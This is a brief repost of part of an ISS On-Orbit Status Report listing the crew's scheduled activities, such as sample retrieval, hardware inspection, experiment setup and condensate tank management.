(RR) – Samples Retrieval from MELFI OCT Hardware Stowage SPHERES – Review 24-hour BP Monitoring (start) CIR – Inspection and Removal WRM. Condensate Pumping Terminate SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup. CAPBEV – Configuration Setup DAN. Experiment Ops. Swap condensation collection from the Lab Condensate Tank to the Water Processing Assembly (WPA) Waste Water Tank (WW tank) while the Sabatier Jumper is installed […]

from ISS On-Orbit Status Report http://ift.tt/1TUKC0Y
via IFTTT